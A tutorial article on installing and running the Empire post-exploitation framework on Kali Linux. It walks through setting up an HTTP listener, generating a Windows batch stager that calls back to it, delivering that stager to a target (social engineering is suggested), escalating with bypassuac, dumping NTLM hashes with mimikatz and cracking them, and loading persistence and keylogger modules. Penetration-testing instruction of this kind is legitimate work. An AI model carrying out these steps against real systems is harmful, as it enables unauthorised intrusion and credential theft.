Introduction
Empire is a post-exploitation framework, which its agents support various Operating Systems (OS). Windows is purely implemented in PowerShell (without powershell.exe!), and Linux/macOS is done in Python 3. Feature-rich with various options to bypass various protections (and allows for easy modification for custom evasion), Empire is often a favourite for Command and Control (C2) activity.
Empire focused solely on python with cryptographically-secure communications with the add-on of flexible architecture. Empire has the means to execute PowerShell agents without the requirement of PowerShell.exe. It can promptly employ post-exploitable modules, which covers a vast range ranging from keyloggers to mimikatz, etc. Empire framework is a combination of the PowerShell Empire and Python Empire projects BCSecurity also makes awesome up-gradation on it, which makes it user-friendly and convenient. Now we are going to use Empire on our Kali Linux.
PowerShell supplies plentiful offensive benefits which additionally consists of the entire entry of .NET, app lock whitelisting, and straight entry to Win32. It additionally constructs malicious binaries in reminiscence. It supplies C2 performance and lets you implant the second stage after the primary one. It may also be used for lateral motion. It comes useful because it develops quickly compared to different frameworks. Additionally, because it doesn't require PowerShell.exe, it permits us to bypass anti-viruses. Therefore, it's best to make use of the Empire.
Install Empire on Kali Linux
Installing Empire on Kali Linux is very easy now. It comes with a Kali official repository. So we just need to type the following command on our terminal window:
sudo apt install PowerShell-empire -yThe above command will prompt for sudo password then start downloading and installing Empire, as we can see in the following screenshot:
After the process is complete we can use Empire.
Using Empire on Kali Linux
After installing Empire we need to use the following command to start the framework.
sudo powershell-empireThen the main screen of Empire comes in front of us, as the following screenshot:
Here we can see that Empire Framework is running. Here we need to use the help command to see all the options of this framework.
helpIt will open the help of this framework as we can see in the following screenshot:
First of all, we need to create a listener on our local machine. Type the following command:
listenersAfter running the above command, it will say that “[!] No listeners currently active”.
Don't worry, We don't have active listeners now but we are now in the listener's interface. Now in the listener's interface, we type the following command:
uselistener <TAB> <TAB>Here in the above command, we type use listener than space, then press the TAB key two times (double TAB) and it will list all the listeners that one can use, such as dbx, HTTP, http_com, redirector, meterpreter, etc.
The most popular and commonly used listener is HTTP and we will use the same in our guide. To use it we need to type the following command:
uselistener httpThis command will start a listener on port 80. If our port 80 is already busy then we need to stop the services (like Apache). Because this listener is an HTTP listener, it only works on port 80.
Now we use the info command, this command shows the information about the particular type of listener we want to start, as seen below.
Here we can see the information about our listener. As we can see in the above screenshot that there are a variety of settings we can use to modify or customize our listener. Let’s try changing the name of our listener as it helps to remember all the listeners that are activated if activated in bulk. So for this, we type the following command:
set Name testThis command will change the 'Name' of the listener to test from HTTP.
Listeners automatically fetch 'Host' local IP (values), but in just case, we need to change it we can do it by using the following command:
set Host 192.168.225.54If we wish we can check again all the information by using the info command again. If everything is alright we can start the listener by using the following command:
executeIn the following screenshot, we can see that our listener has been started.
Then we go back from the listener interface so that we can execute our modules by using the following command:
back
Now we can use stagers on Empire.
Using Stagers on PowerShell Empire
Stagers in Empire are used to set the stage for the post-exploitation activities. They are very similar to payloads, which are used to create a connection back to Empire listener. Stagers can be accessed by using usestager command. We run following command to see all the available stagers.
usestager <tab> <tab>After using double TAB we can see all the stagers in the following screenshot:
On the above screenshot we can there are lots of modules for Windows and OSX (macOS) also there are some stagers for multi purpose works. Those multi stagers works on any platform.
Here for an example we assume that target is a Windows PC and we use launcher_bat to exploit our target. So we use following command:
usestager windows/launcher_batThis command will set the launcher_bat stager for our target. We set our listener here by using following command:
set Listener testNow we just need to execute command to execute.
executeThese above commands will execute our exploit after setting the listener test and creating /tmp/launcher.bat file. Now we need to send this bat file to victim's Windows system anyhow (We can use social engineering tricks). Here we are on our local network and sending this file to our own Windows PC by using simpleHTTP server of Python.
After sending and running the bat file on our target Windows PC we got session on our listener, as we can see in the following screenshot:
Agents of Empire
When we send the stager to our target system and the machine executes it, we get a reverse connection back. This is known as an agent.
We can see our agents by simply using agents command:
agentsWe can see our active agents in the following screenshot.
Now we are in agents menu and we can check agents help by using help command.
If the name of the agent not look easy to remember we can change the name of the agent by simply using the following command:
rename AgentName NewNameWe have changed our agents name as shown in the following screenshot:
Now we can interact with our agent (we renamed it Agent1 for example) by using following command:
interact Agent1After applying the command we can interact with our agent as seen in the following screenshot:
Here also we can press double TAB (TAB TAB) to view all the options in the shell. We got many options which will be very helpful for post exploitation, such as info, job, list and etc as shown in the following screenshot:
Here for an example we run info command to check the information about our target, as shown in the following screenshot:
Now at this point we got session. But to get admin session we need to run bypassuac <listenerName>:
bypassuac testThe above command will add another agent here, as we can see in the following screenshot:
We can hit enter after sending stage2 agent to get back our console. Now again we can see all our agents list by using agents command, we also renamed our new agent as 'Agent2', as shown in the following screenshot:
Our new agent(Agent2) got admin privilege, now we can interact with our new agent by simply using interact <agentname> command:
interact Agent2
For help we also can press <TAB><TAB>(double TAB)here. We can see all options that we can run. We also can run mimikatz here to get the password of our target user on Windows system. We knows that mimikatz will not run in a guest user shell. It requires admin shell, it will be proved here that we got admin access here that's why we can run mimikatz here.
To run mimikatz we just use following command:
mimikatzMimikatz will run if our agent have admin privileges, and we can see it on the following screenshot:
On the above screenshot we can see that our mimikatz is working fine and we got NTLM hash if we were lucky then we also can get plaintext Windows login password here. otherwise we can crack this NTLM hash using RainbowTables or we can use online cracking tools.
Cracked the NTLM hash online using CrackStation
Modules on Empire
We also can run various modules using Empire. We can access modules using the usemodule command. We need to type usemodule <Space> <tab> <tab> means, we need to use tab twice after space to see all the modules.
We can use all these modules to perform activities on target system. We can create persistence backdoor on infected system, keylooggers, even we can prank the system user by showing some text or changing wallpaper.
We will learn more about different modules in a later tutorial. First, let's take a look at how to use modules in Empire. Let's use the "external/generate_agent" as an example. We need to type following command:
usemodule external/generate_agentThe above command will load the module. Once the required module is loaded, type help command to see all the commands we can use with the module.
Then we need to set our Listener by using set Listener <listenerName> command:
set Listener testThen we need to set the language for the module to run by using following command:
set Language powershellThen we just need to run execute command to execute it. Simple.
This is how we can use Empire Framework on our Kali Linux system. As we learned on this article Empire can do almost anything on the effected system. The agents and modules opens many more new way for an attacker. Previously this known as PowerShell Empire (archived) now it's under BCSecurity and it is called Empire, So we can tell "Empire Strikes Back". This tool is in development stage so some errors may encounter.
Comments